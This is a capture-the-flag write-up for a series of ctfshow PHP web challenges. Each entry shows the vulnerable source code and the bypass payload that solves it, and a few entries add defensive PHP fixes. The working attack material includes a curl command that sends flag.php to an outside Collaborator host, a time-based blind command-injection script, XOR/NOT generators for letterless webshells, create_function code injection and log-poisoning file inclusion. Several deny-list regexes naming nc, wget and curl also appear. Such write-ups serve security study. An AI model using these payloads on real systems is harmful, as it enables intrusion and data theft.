$ctf_show = md5($flag);
$url = $_SERVER['QUERY_STRING'];
// special character check
function waf($url){
    if(preg_match('/\`|\~|\!|\@|\#|\^|\*|\(|\)|\\$|\_|\-|\+|\{|\;|\:|\[|\]|\}|\'|\"|\<|\,|\>|\.|\\\|\//', $url)){
        return true;
    }else{
        return false;
    }
}
if(waf($url)){
    die("嗯哼?");
}else{
    extract($_GET);
}
if($ctf_show==='ilove36d'){
    echo $flag;
}
$url = $_SERVER['QUERY_STRING']; gets the submitted query string
extract($_GET); performs the variable overwrite
Passing ctf_show=ilove36d gives the flag.
However, _ is filtered while the space is not, so a space can be used in place of _.
In PHP, a space, +, [ or . in a variable name is automatically replaced with _.
payload: ?ctf show=ilove36d
Web128
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-10 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-12 19:49:05
*/
error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
$f1 = $_GET['f1'];
$f2 = $_GET['f2'];
if(check($f1)){
    var_dump(call_user_func(call_user_func($f1,$f2)));
}else{
    echo "嗯哼?";
}
function check($str){
    return !preg_match('/[0-9]|[a-z]/i', $str);
}
NULL
gettext(): used to internationalize a program
echo gettext(123); ~= echo 123;
_(): an alias of gettext()
get_defined_vars(): returns an array of all defined variables
f1=_ satisfies the condition.
f2 = get_defined_vars: the returned array is used as the argument of f1.
payload: get_defined_vars
This gives the flag.
Web129
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 03:18:40
*/
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['f'])){
    $f = $_GET['f'];
    if(stripos($f, 'ctfshow')>0){
        echo readfile($f);
    }
}
stripos(): finds the position of the first occurrence of a string
readfile(): outputs a file
ctfshow must not be at the very start of the value.
Directory traversal
payload: ?f=/ctfshow/…/…/…/…/…/…/var/www/html/flag.php
View the page source to get the flag.
Web130
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = $_POST['f'];
    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f, 'ctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}
payload: ?f=ctfshow
Just get past the regex.
Web131 (regex match overflow)
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 05:19:40
*/
error_reporting(0);
highlight_file(__FILE__);
include("flag.php");
if(isset($_POST['f'])){
    $f = (String)$_POST['f'];
    if(preg_match('/.+?ctfshow/is', $f)){
        die('bye!');
    }
    if(stripos($f,'36Dctfshow') === FALSE){
        die('bye!!');
    }
    echo $flag;
}
Regex matching in PHP is subject to a limit; when the limit is exceeded, preg_match() returns false.
Generate a string 250,000 characters long.
Send it as f via POST to get the flag.
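Web131 relies on `if(preg_match(...))` treating the error result false the same as "no match". The following is an added example, not the challenge's code (blocked_by_pattern(), the lowered limit and the sample inputs are illustrative): a wrapper that fails closed when the regex engine reports an error, shown next to the plain truthiness test.

```php
<?php
/**
 * Hypothetical wrapper (not from the challenge): a regex used as a security
 * check must fail closed. preg_match() returns 1 (match), 0 (no match) or
 * false (engine error, for example an exceeded backtrack limit); false is
 * not the same as "no match".
 */
function blocked_by_pattern(string $pattern, string $input): bool
{
    $r = preg_match($pattern, $input);
    if ($r === false) {
        error_log('regex check failed, PCRE error code ' . preg_last_error());
        return true;                  // treat an engine error as "blocked"
    }
    return $r === 1;
}

// Demonstration settings only: disable the JIT and use a small limit so a
// short constructed input is enough to hit it.
ini_set('pcre.jit', '0');
ini_set('pcre.backtrack_limit', '1000');

$pattern = '/.+?ctfshow/is';                        // the check from Web130/Web131
$short   = 'xx ctfshow';                            // constructed
$long    = str_repeat('a', 5000) . '36Dctfshow';    // constructed

foreach (['short' => $short, 'long' => $long] as $label => $input) {
    $raw = preg_match($pattern, $input);
    printf(
        "%-5s raw=%-5s if(preg_match)=%-7s fail-closed=%s\n",
        $label,
        var_export($raw, true),
        $raw ? 'blocked' : 'allowed',
        blocked_by_pattern($pattern, $input) ? 'blocked' : 'allowed'
    );
}
```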
Web132 (tests the use of the && and || operators)
A scan finds /admin.
Visiting it gives the source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 06:22:13
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 20:05:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
#error_reporting(0);
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){
    $username = (String)$_GET['username'];
    $password = (String)$_GET['password'];
    $code = (String)$_GET['code'];
    if($code === mt_rand(1,0x36D) && $password === $flag || $username ==="admin"){
        if($code == 'admin'){
            echo $flag;
        }
    }
}
The second check is satisfied as long as username=admin.
Set code=admin to get the flag.
password can be anything.
payload: ?username=admin&password=flag&code=admin
Web133
Reference: https://blog.csdn.net/qq_46091464/article/details/109095382
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-13 16:43:44
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|netcat/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("6个字母都还不够呀?!");
    }
}
Nested command execution
?F=`$F`; sleep 5
`` is shorthand for shell_exec.
You can observe that sleep 5 was executed.
Commands can be executed, but their output cannot be read back.
Use curl -F together with Burp's Collaborator Client.
payload: ?F=`$F`; curl -X POST -F xx=@flag.php 6mtyo3lfs82ed24inzaj1tn7uy0ood.burpcollaborator.net
Web134
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-14 23:01:06
*/
highlight_file(__FILE__);
$key1 = 0;
$key2 = 0;
if(isset($_GET['key1']) || isset($_GET['key2']) || isset($_POST['key1']) || isset($_POST['key2'])) {
    die("nonononono");
}
@parse_str($_SERVER['QUERY_STRING']);
extract($_POST);
if($key1 == '36d' && $key2 == '36d') {
    die(file_get_contents('flag.php'));
}
This tests variable overwrite.
extract($_POST) unpacks $_POST, and parse_str() turns the GET query string into variables.
payload: ?_POST[key1]=36d&_POST[key2]=36d
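Web105, Web127 and Web134 all let request keys become variable names, through $$key, extract() or parse_str() without a target array. The following is an added example, not the challenge's code (read_params(), demo() and the query strings are illustrative): it parses into an array, shows what extract() does to an existing variable, and copies only the expected keys.

```php
<?php
/**
 * Hypothetical replacement for extract($_GET) (not from the challenges):
 * copy only the expected keys, as strings, into a separate array.
 * Request data never gets to name a variable.
 */
function read_params(array $source, array $expected): array
{
    $out = [];
    foreach ($expected as $key) {
        $out[$key] = (isset($source[$key]) && is_string($source[$key]))
            ? $source[$key]
            : null;
    }
    return $out;
}

function demo(string $queryString): array
{
    $ctf_show = 'server-side value';      // stands in for md5($flag)
    parse_str($queryString, $params);     // always pass the target array
    $keys = array_keys($params);          // names after PHP's key mangling

    extract($params);                     // vulnerable: may replace $ctf_show
    $afterExtract = $ctf_show;

    $ctf_show = 'server-side value';
    extract($params, EXTR_SKIP);          // existing variables are kept
    $afterSkip = $ctf_show;

    return [
        'keys'          => $keys,
        'after_extract' => $afterExtract,
        'after_skip'    => $afterSkip,
        'allow_listed'  => read_params($params, ['page']),
    ];
}

// Constructed query strings using the key shapes discussed above
// (a space or a dot in the name instead of the filtered underscore).
foreach (['page=1', 'ctf show=ilove36d', 'ctf.show=x&page=2'] as $qs) {
    echo $qs, "\n", json_encode(demo($qs)), "\n\n";
}
```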
Web135
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 18:48:03
*/
error_reporting(0);
highlight_file(__FILE__);
//flag.php
if($F = @$_GET['F']){
    if(!preg_match('/system|nc|wget|exec|passthru|bash|sh|netcat|curl|cat|grep|tac|more|od|sort|tail|less|base64|rev|cut|od|strings|tailf|head/i', $F)){
        eval(substr($F,0,6));
    }else{
        die("师傅们居然破解了前面的,那就来一个加强版吧");
    }
}
Linux tee: saves the output to a file
tee solves the problem that the result of the executed command is not displayed.
Run it, then visit ls.
Download the file and look at it.
Then visit 111.
This gives the flag.
Web137
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 22:27:49
*/
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
call_user_func($_POST['ctfshow']);
Using a class
Web138
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-16 22:52:13
*/
error_reporting(0);
highlight_file(__FILE__);
class ctfshow
{
    function __wakeup(){
        die("private class");
    }
    static function getFlag(){
        echo file_get_contents("flag.php");
    }
}
if(strripos($_POST['ctfshow'], ":")>-1){
    die("private function");
}
call_user_func($_POST['ctfshow']);
The : cannot be used,
but call_user_func() also accepts the callback in array form.
Web139
Source:
<?php
error_reporting(0);
function check($x){
    if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
        die('too young too simple sometimes naive!');
    }
}
if(isset($_GET['c'])){
    $c=$_GET['c'];
    check($c);
    exec($c);
}
else{
    highlight_file(__FILE__);
}
?>
There is no write permission.
Use a shell if statement together with awk and cut to obtain the flag.
awk's NR selects the line number.
awk fetches the data line by line.
cut picks out single characters column by column.
Use ls / to list the files in the root directory.
python:
# -*- coding: utf-8 -*-
# @Time : 2021/7/16 10:23
# @Author : CC
# @Software: PyCharm
import requests
import threading
url = 'http://35f22f85-52fb-41fa-bf20-132a7bcb033e.challenge.ctf.show:8080/'
def getflag():
    result = ""
    for i in range(1,5):
        for j in range(1,15):
            for k in range(32,128): # ASCII table
                k = chr(k)
                payload = "?c=" + f"if [ `ls / | awk NR=={i} | cut -c {j}` == {k} ];then sleep 2;fi"
                try:
                    requests.get(url=url+payload,timeout=(1.5,1.5))
                except requests.exceptions.Timeout:
                    # a timeout means the sleep ran, i.e. the character matched
                    result += k
                    print(result)
                    break
        result += " "
if __name__ == '__main__':
    # pass the function itself; getflag() would run it before the thread starts
    t = threading.Thread(target=getflag)
    t.start()
This reveals the flag file.
Read the file to get the flag.
Web140
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 12:39:25
*/
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['f1']) && isset($_POST['f2'])){
    $f1 = (String)$_POST['f1'];
    $f2 = (String)$_POST['f2'];
    if(preg_match('/^[a-z0-9]+$/', $f1)){
        if(preg_match('/^[a-z0-9]+$/', $f2)){
            $code = eval("return $f1($f2());");
            if(intval($code) == 'ctfshow'){
                echo file_get_contents("flag.php");
            }
        }
    }
}
Weak (loose) type comparison
You can see that comparing 0 with a string yields true.
With ==, both sides are first converted to the same type; a string converted to an integer becomes 0.
intval(): converts non-numeric values or non-numeric strings to 0
So the call can be built from a hash function such as md5 or sha1.
Web141
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 19:28:09
*/
#error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];
    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/^\W+$/', $v3)){
            $code = eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}
The regex ^\W+$ excludes digits, letters and underscores, so use a webshell with no letters and no digits.
Build the payload with XOR.
Python script:
# -- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/10 12:56
# blog: www.wlhhlc.top
import requests
import urllib
import re

# generate the usable characters
def write_rce():
    result = ''
    preg = '[a-zA-Z0-9]'
    for i in range(256):
        for j in range(256):
            if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):
                k = i ^ j
                if k >= 32 and k <= 126:
                    a = '%' + hex(i)[2:].zfill(2)
                    b = '%' + hex(j)[2:].zfill(2)
                    result += (chr(k) + ' ' + a + ' ' + b + '\n')
    f = open('xor_rce.txt', 'w')
    f.write(result)
    f.close()

# look up each character of the input command in the generated txt
def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("xor_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"^\"" + s2 + "\")"
    return (output)

def main():
    write_rce()
    while True:
        s1 = input("\n[+] your function:")
        if s1 == "exit":
            break
        s2 = input("[+] your command:")
        param = action(s1) + action(s2)
        print("\n[*] result:\n" + param)

main()
Run it to get the payload.
v1 and v2 must be numeric; v3: ("%08%02%08%08%05%0d""%7b%7b%7b%7c%60%60")("%0c%08""%60%7b")
Because of the return, an operator such as + - * has to be added before and after v3.
Then go on generating the payload.
Web142
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-17 19:36:02
*/
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['v1'])){
    $v1 = (String)$_GET['v1'];
    if(is_numeric($v1)){
        $d = (int)($v1 * 0x36d * 0x36d * 0x36d * 0x36d * 0x36d);
        sleep($d);
        echo file_get_contents("flag.php");
    }
}
Just pass 0 for v1; otherwise… you will be waiting forever.
payload: ?v1=0
Web143
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 12:48:14
*/
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];
    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;/i', $v3)){
            die('get out hacker!');
        }
        else{
            $code = eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}
More symbols are filtered.
Only the rule in the Web141 script needs to be changed.
# -- coding:UTF-8 --
# Author:dota_st
# Date:2021/2/10 12:56
# blog: www.wlhhlc.top
import requests
import urllib
import re

# generate the usable characters
def write_rce():
    result = ''
    preg = r'[a-z]|[0-9]|\+|\-|\.|\_|\||\$|\{|\}|\~|\%|\&|\;'
    for i in range(256):
        for j in range(256):
            if not (re.match(preg, chr(i), re.I) or re.match(preg, chr(j), re.I)):
                k = i ^ j
                if k >= 32 and k <= 126:
                    a = '%' + hex(i)[2:].zfill(2)
                    b = '%' + hex(j)[2:].zfill(2)
                    result += (chr(k) + ' ' + a + ' ' + b + '\n')
    f = open('xor_rce.txt', 'w')
    f.write(result)
    f.close()

# look up each character of the input command in the generated txt
def action(arg):
    s1 = ""
    s2 = ""
    for i in arg:
        f = open("xor_rce.txt", "r")
        while True:
            t = f.readline()
            if t == "":
                break
            if t[0] == i:
                s1 += t[2:5]
                s2 += t[6:9]
                break
        f.close()
    output = "(\"" + s1 + "\"^\"" + s2 + "\")"
    return (output)

def main():
    write_rce()
    while True:
        s1 = input("\n[+] your function:")
        if s1 == "exit":
            break
        s2 = input("[+] your command:")
        param = action(s1) + action(s2)
        print("\n[*] result:\n" + param)

main()
Generate the payload.
This reveals the flag file.
Generate the payload that reads the flag file.
This gives the flag.
Web144
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 16:21:15
*/
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];
    if(is_numeric($v1) && check($v3)){
        if(preg_match('/^\W+$/', $v2)){
            $code = eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}
function check($str){
    return strlen($str)===1?true:false;
}
Building on Web141, just swap the values of v2 and v3.
Web145
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 17:41:33
*/
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];
    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/[a-z]|[0-9]|\@|\!|\+|\-|\.|\_|\$|\}|\%|\&|\;|\<|\>|\*|\/|\^|\#|\"/i', $v3)){
            die('get out hacker!');
        }
        else{
            $code = eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}
Bitwise NOT (~) is not filtered, and | can be used.
NOT script:
<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';
Run it to get the payload.
Add | before and after v3.
Web146
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-18 17:41:33
*/
highlight_file(__FILE__);
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
    $v1 = (String)$_GET['v1'];
    $v2 = (String)$_GET['v2'];
    $v3 = (String)$_GET['v3'];
    if(is_numeric($v1) && is_numeric($v2)){
        if(preg_match('/[a-z]|[0-9]|\@|\!|\:|\+|\-|\.|\_|\$|\}|\%|\&|\;|\<|\>|\*|\/|\^|\#|\"/i', $v3)){
            die('get out hacker!');
        }
        else{
            $code = eval("return $v1$v3$v2;");
            echo "$v1$v3$v2 = ".$code;
        }
    }
}
XOR is filtered but NOT is not; the approach is the same as Web145.
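Web141 to Web146 keep extending a character deny-list in front of eval("return $v1$v3$v2;"), and each list is passed with another operator. The following is an added example, not the challenge's code (calc() and the sample requests are illustrative): the same calculator without eval, where the operator is looked up in a fixed table and the operands are parsed as numbers.

```php
<?php
/**
 * Hypothetical eval-free calculator (not from the challenges): returns the
 * result, or null when any part of the input is not exactly what is expected.
 */
function calc($left, $op, $right)
{
    foreach ([$left, $right] as $v) {
        // Canonical decimal number only; is_numeric() alone also accepts
        // exponent forms and surrounding whitespace.
        if (!is_string($v)
            || preg_match('/\A-?(0|[1-9][0-9]{0,14})(\.[0-9]{1,10})?\z/', $v) !== 1) {
            return null;
        }
    }
    $a = $left + 0;      // validated numeric string to int or float
    $b = $right + 0;

    // One operator, looked up in a closed table: nothing the caller sends
    // is ever interpreted as PHP code.
    $ops = [
        '+' => fn($x, $y) => $x + $y,
        '-' => fn($x, $y) => $x - $y,
        '*' => fn($x, $y) => $x * $y,
        '/' => fn($x, $y) => $y == 0 ? null : $x / $y,
    ];
    if (!is_string($op) || !isset($ops[$op])) {
        return null;
    }
    return $ops[$op]($a, $b);
}

// Constructed requests: one ordinary calculation and four that are refused
// (division by zero, unsupported operator, exponent form, array operand).
$requests = [
    ['6', '*', '7'],
    ['1', '/', '0'],
    ['1', '^', '1'],
    ['1e3', '+', '1'],
    [['1'], '+', '1'],
];
foreach ($requests as [$l, $o, $r]) {
    printf("%-22s => %s\n", json_encode([$l, $o, $r]), var_export(calc($l, $o, $r), true));
}
```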
Web147
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 02:04:38
*/
highlight_file(__FILE__);
if(isset($_POST['ctf'])){
    $ctfshow = $_POST['ctf'];
    if(!preg_match('/^[a-z0-9_]*$/isD',$ctfshow)) {
        $ctfshow('',$_GET['show']);
    }
}
ctf is filtered; the show value from GET and the ctf value from POST are combined.
Use create_function() code injection.
Example
The regex can be bypassed with \, which in PHP denotes the default namespace.
Prefixing the name with \ makes it an absolute path.
payload: post: ctf=\create_function
get: ?show=echo 123;}system("tac flag.php");//
Web148
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 03:52:11
*/
include 'flag.php';
if(isset($_GET['code'])){
    $code=$_GET['code'];
    if(preg_match("/[A-Za-z0-9_\%\\|\~\'\,\.\:\@\&\*\+\- ]+/",$code)){
        die("error");
    }
    @eval($code);
}
else{
    highlight_file(__FILE__);
}
function get_ctfshow_fl0g(){
    echo file_get_contents("flag.php");
}
Same approach as Web141.
Web149
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 04:34:40
*/
error_reporting(0);
highlight_file(__FILE__);
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
file_put_contents($_GET['ctf'], $_POST['show']);
$files = scandir('./');
foreach($files as $file) {
    if(is_file($file)){
        if ($file !== "index.php") {
            unlink($file);
        }
    }
}
Any file in this directory other than index.php is deleted.
Write the webshell directly into index.php, then connect to get the flag.
Web150
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-10-13 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-10-19 07:12:57*/
include("flag.php");
error_reporting(0);
highlight_file(__FILE__);
class CTFSHOW{
    private $username;
    private $password;
    private $vip;
    private $secret;
    function __construct(){
        $this->vip = 0;
        $this->secret = $flag;
    }
    function __destruct(){
        echo $this->secret;
    }
    public function isVIP(){
        return $this->vip?TRUE:FALSE;
    }
}
function __autoload($class){
    if(isset($class)){
        $class();
    }
}
# filter characters
$key = $_SERVER['QUERY_STRING'];
if(preg_match('/\_| |\[|\]|\?/', $key)){
    die("error");
}
$ctf = $_POST['ctf'];
extract($_GET);
if(class_exists($__CTFSHOW__)){
    echo "class is exists!";
}
if($isVIP && strrpos($ctf, ":")===FALSE){
    include($ctf);
}
Unintended solution: file inclusion
isVIP must be true or 1.
Because of extract(), isVIP=1 can be passed via GET.
The log /var/log/nginx/access.log can be included.
First insert a one-line webshell into the log.
POST parameter ctf: /var/log/nginx/access.log
GET parameters: ?isVIP=1&1=system('cat flag.php');
This gives the flag.